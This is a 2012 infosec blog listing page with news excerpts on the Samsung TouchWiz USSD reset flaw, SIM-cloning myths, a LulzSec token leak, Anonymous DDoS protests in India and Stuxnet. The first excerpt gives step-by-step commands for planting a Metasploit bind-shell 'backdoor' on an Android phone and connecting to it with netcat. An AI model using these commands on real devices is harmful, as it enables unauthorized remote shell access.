
Posted by on Oct 5, 2012 in Infosec, Malware | 0 comments

A simple Android shell with Metasploit

_anUBiS, a respected member of the corrupt, a computer security forum, has posted a method to open an Android shell with the Metasploit Framework. The steps given by him are as follows:

1) Create ARM executable: msfvenom -p linux/armle/shell_bind_tcp -f elf LPORT=6666 > /tmp/backdoor
2) Mount your Android /system/bin dir for r/w. I used the “Root Explorer” app for this. There are other ways to do it.
3) Copy /tmp/backdoor (from Backtrack) to /system/bin/backdoor (your phone) and chmod 777
4) Run ‘backdoor’ on your phone. (Use a terminal emulator, or find any other way.)
5) Connect to phone: nc your.phone.ip.address 6666
6) When connection is established, set PATH variable: PATH=/system/bin

He further says it still needs root permission to plant this, and the shell does not listen persistently, so when we disconnect, the file must be run again on the phone. Source :...

Posted by on Sep 25, 2012 in Hacking, Infosec | 0 comments

Samsung Touch Wiz exploit could reset your smartphone with a click

Image: A Samsung Galaxy SII with Touch Wiz

If you are a Samsung smartphone owner, you are in for big trouble if Samsung does not soon release a fix for a recent exploit by which anyone can factory reset your mobile with a simple click! Ravi Shankar, a security researcher in the Telecommunications department at Technical University Berlin, demoed the USSD code vulnerability in the Samsung Touch Wiz Android skin, found in its flagship smartphones such as the Galaxy S1, SII and the more recent SIII, at the Ekoparty security conference in Buenos Aires. He said that the USSD code to reset Samsung smartphones can be invoked via HTML, QR and NFC and the phone can be factory reset with user intervention. He further added that the URL for the malicious site with HTML code could be sent as an SMS and still wipe the phone when the link is clicked. This exploit is confirmed to work on all Galaxy SII models and the AT&T version of the Galaxy SIII, Ravi mentions in the...

Posted by on Jul 2, 2012 in Hacking, Infosec | 0 comments

Why stealing data from mobile phone is not possible through SIM cloning and media should research further

The news making waves in tech circles in India today was the one from the Times of India regarding the SIM card cloning warning from BSNL, which says that if you get a missed call from +92; #90 or #09 you shouldn’t call them back because your SIM (Subscriber Identity Module) would be cloned. That’s not all. Here comes the hilarious second part: TOI claims that an intelligence official who spoke to them mentioned that the person who cloned the SIM could steal the data from your mobile and also from the external memory card. Following the usual plagiarism in the news industry today, various leading tech sites, including thinkDigit, published the article without researching its technical feasibility. (Note: By the time of writing this article, TOI has edited the article saying it has reservations on the claims made by the officials.) Now let’s come to the basics of SIM cloning: 1. A phreaker (a person who hacks telecommunication systems) snoops around the target cellphone with...

Posted by on Jun 12, 2012 in Hacking, Infosec | 0 comments

8000 Twitter accounts data posted by LulzSec, passwords not hacked

The infamous hacking group LulzSec, known for their motive-less hacking of high-profile targets, has released data from 8000 Twitter accounts that used the image sharing service TweetGif. Unlike earlier hacks, this does not include passwords/hashes. The file mostly contained public information like names and locations displayed next to the Twitter handles. But the list contained token/secret pairs, which are used to authorize third-party services like TweetGif to post to an account. However, these codes expire over time. Access to these services can be revoked using the Twitter settings. A Twitter spokesman has said, “I can confirm that no Twitter account passwords were leaked,” “Twitter was not compromised in this instance.” This shows the importance of security policies to be followed by third-party services which collaborate with social network sites. source :...

Posted by on Jun 9, 2012 in Hacking, Infosec | 1 comment

Anonymous supported Anti web-censorship protests across India

Image: Anti web-censorship protest in Delhi

In a first for India, people were seen in major cities wearing ‘Guy Fawkes’ masks, showing support for the infamous hacktivist group ‘Anonymous’ in their protest against the recent series of web-censorship in India. Anonymous had called for support of anti web-censorship protests across India today. Earlier today it launched DDoS (Distributed Denial of Service) attacks on the Indian government sites of the Computer Emergency Response Team (CERT – www.cert.org.in) and www.india.gov.in; these sites were down till afternoon. On June 6, the website of state-run telecom company MTNL was disrupted by ‘Anonymous’ to protest against “censorship” of the internet. The protesters were seen holding banners and raised slogans like, “Raise your voice, save your voice.” The protests, called #opindia on social networking sites such as Twitter and Facebook, came to light on March 29 when a court order was passed in Chennai asking 15 Indian ISPs (Internet Service Providers) to block access to file-sharing websites such as The Pirate Bay. Also the recent...

Posted by on Jun 9, 2012 in Infosec, Malware | 0 comments

Operation: Olympic Games, the secrets behind the world’s first sophisticated cyber attack malware – Stuxnet

Image: Iran’s president Ahmadinejad looking at the centrifuges

The world’s first sophisticated cyber attack malware, Stuxnet, was the weapon of the operation Olympic Games, says The New York Times in an article published earlier this week. The detailed article says a cyberwar against Iran’s nuclear enrichment program was launched during the Bush administration and was accelerated by the Obama administration. The operation was called ‘Olympic Games’. Stuxnet was the weapon of the Olympic Games, jointly developed by the NSA (National Security Agency) of America and Israel’s Unit 8200 (part of Israel’s military technical intelligence unit). Israel had cooperated with the United States in this operation, disabling Iran’s nuclear enrichment program by sabotaging thousands of centrifuges in the Natanz underground nuclear plant in Iran. The Stuxnet malware was intended to infect only the computers connected with the centrifuges but went wild due to an error in the program in one of the updates which followed the initial version. It seems initially the malware was introduced to the computers in the Natanz plant by...
